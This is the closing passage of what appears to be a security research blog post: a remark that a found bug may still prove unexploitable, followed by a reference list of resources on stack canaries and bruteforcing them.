Alas, this is the life of security research — sometimes, even when you’ve found the bug, there’s still no guarantee you’ll be able to exploit it.

references

Stack Canaries – Gingerly Sidestepping the Cage [2021]
LiveOverflow video
CTF guide on stack canaries
Bruteforcing x86 Stack Canaries